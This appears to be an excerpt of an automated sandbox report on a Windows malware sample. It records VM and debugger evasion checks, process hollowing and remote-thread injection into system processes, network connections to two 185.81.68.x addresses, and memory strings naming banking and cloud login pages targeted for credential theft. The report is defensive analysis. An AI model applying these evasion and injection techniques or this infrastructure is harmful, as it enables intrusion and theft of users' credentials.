                          Source: explorer.exe, 00000005.00000003.3084849985.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3821436820.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1331938648.00000000087C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW6
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696503903f
                          Source: rundll32.exe, 00000021.00000002.3797376340.0000000002E1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                          Source: rundll32.exe, 0000001A.00000002.3469272832.0000022206438000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWft\O
                          Source: 759D.tmp.gfx.exe, 00000012.00000003.1593713018.0000000000CA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: explorer.exe, 00000005.00000003.2193186163.00000000088E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000r
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696503903x
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696503903x
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696503903
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696503903
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696503903
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696503903
                          Source: explorer.exe, 00000005.00000002.3816144708.0000000004027000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}s/U6
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696503903
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1762232082.0000000000E74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
                          Source: explorer.exe, 00000005.00000000.1331938648.00000000087FE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696503903
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696503903
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                          Source: explorer.exe, 00000005.00000002.3821436820.0000000008761000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696503903t
                          Source: explorer.exe, 00000005.00000000.1331938648.00000000087FE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
                          Source: explorer.exe, 00000005.00000003.2193186163.00000000088E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}AsVuser
                          Source: explorer.exe, 00000005.00000003.2193186163.00000000088E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}otti
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696503903j
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                          Source: explorer.exe, 00000005.00000000.1326366348.00000000005A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000\
                          Source: explorer.exe, 00000005.00000000.1331938648.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3821436820.0000000008761000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                          Source: explorer.exe, 00000005.00000000.1326366348.00000000005A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeAPI call chain: ExitProcess graph end nodegraph_0-882
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeAPI call chain: ExitProcess graph end nodegraph_0-899
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeAPI call chain: ExitProcess graph end nodegraph_0-880
                          Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_2-872
                          Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_2-894
                          Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_2-881
                          Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end nodegraph_5-38965
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeAPI call chain: ExitProcess graph end nodegraph_6-931
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeAPI call chain: ExitProcess graph end nodegraph_6-926
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeAPI call chain: ExitProcess graph end nodegraph_6-948
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeAPI call chain: ExitProcess graph end nodegraph_6-929
                          Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_8-884
                          Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_8-876
                          Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_8-886
                          Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_8-896
                          Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_9-888
                          Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_9-897
                          Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_9-900
                          Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_9-909
                          Source: C:\Windows\System32\audiodg.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCode function: 0_2_00007FF7CDC4321C IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_00007FF7CDC4321C
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_0-1132
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_6-1181
                          Source: C:\Windows\System32\audiodg.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_8-1129
                          Source: C:\Windows\System32\svchost.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_2-1128
                          Source: C:\Windows\System32\msiexec.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_9-1142
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCode function: 0_2_00007FF7CDC4321C IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_00007FF7CDC4321C
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5D7B24 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_0C5D7B24
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5B88B0 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,5_2_0C5B88B0
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCode function: 0_2_00007FF7CDC41050 LoadLibraryA,GetProcAddress,0_2_00007FF7CDC41050
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004DE250 mov eax, dword ptr fs:[00000030h]18_2_004DE250
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004E66E2 mov eax, dword ptr fs:[00000030h]18_2_004E66E2
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_0032E250 mov eax, dword ptr fs:[00000030h]19_2_0032E250
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_003366E2 mov eax, dword ptr fs:[00000030h]19_2_003366E2
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_0032E250 mov eax, dword ptr fs:[00000030h]20_2_0032E250
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_003366E2 mov eax, dword ptr fs:[00000030h]20_2_003366E2
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCode function: 0_2_00007FF7CDC41CDC InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetCloseHandle,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,RtlAllocateHeap,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00007FF7CDC41CDC
                          Source: C:\Windows\System32\svchost.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102D9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF7102D9924
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102CBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF7102CBBC0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102CC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF7102CC44C
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102CC62C SetUnhandledExceptionFilter,11_2_00007FF7102CC62C
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102D9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF7102D9924
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102CBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF7102CBBC0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102CC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF7102CC44C
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102CC62C SetUnhandledExceptionFilter,16_2_00007FF7102CC62C
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE230F20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FFEEE230F20
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE20A184 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FFEEE20A184
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEF5DD4A34 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FFEF5DD4A34
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEF5DD5054 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FFEF5DD5054
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEF6556810 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FFEF6556810
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEF6555DF8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FFEF6555DF8
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEF65569F8 SetUnhandledExceptionFilter,16_2_00007FFEF65569F8
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEF6C9D414 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FFEF6C9D414
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004DF25D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_004DF25D
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004DA895 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_004DA895
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004DA9F8 SetUnhandledExceptionFilter,18_2_004DA9F8
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004D9FA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_004D9FA8
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_0032A895 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0032A895
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_0032A9F8 SetUnhandledExceptionFilter,19_2_0032A9F8
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_0032F25D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0032F25D
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_00329FA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00329FA8
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_0032A895 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_0032A895
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_0032A9F8 SetUnhandledExceptionFilter,20_2_0032A9F8
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_0032F25D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_0032F25D
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_00329FA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00329FA8
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: C:\Windows\explorer.exeFile created: 56C7.tmp.ctx.exe.5.drJump to dropped file
                          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.81.68.147 80
                          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.81.68.148 80
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF6FDB50000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF68DEA0000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF63B520000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF68DEA0000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF63B520000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF6FDB50000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF63B520000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF6FDB50000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF68DEA0000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCode function: 0_2_00007FF7CDC42048 GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,0_2_00007FF7CDC42048
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCode function: 0_2_00007FF7CDC42CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,0_2_00007FF7CDC42CB8
                          Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF68DEA2CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,2_2_00007FF68DEA2CB8
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5B3100 OpenProcess,GetModuleHandleA,GetProcAddress,CloseHandle,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,VirtualFreeEx,CloseHandle,5_2_0C5B3100
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5B4200 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,5_2_0C5B4200
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeCode function: 6_2_00007FF673522CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,6_2_00007FF673522CB8
                          Source: C:\Windows\System32\audiodg.exeCode function: 8_2_00007FF6FDB52CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,8_2_00007FF6FDB52CB8
                          Source: C:\Windows\System32\msiexec.exeCode function: 9_2_00007FF63B522CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,9_2_00007FF63B522CB8
                          Source: C:\Windows\System32\svchost.exeThread created: C:\Windows\explorer.exe EIP: B00AB10Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeNtUnmapViewOfSection: Indirect: 0x7FF6735223DCJump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeNtUnmapViewOfSection: Indirect: 0x7FF7CDC423DCJump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB50000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA0000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B520000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: AFF0000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA0000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B520000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB50000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF63B520000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6FDB50000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF68DEA0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\svchost.exeMemory written: PID: 2592 base: AFF0000 value: 4DJump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeThread register set: target process: 5620Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeThread register set: target process: 2012Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeThread register set: target process: 2704Jump to behavior
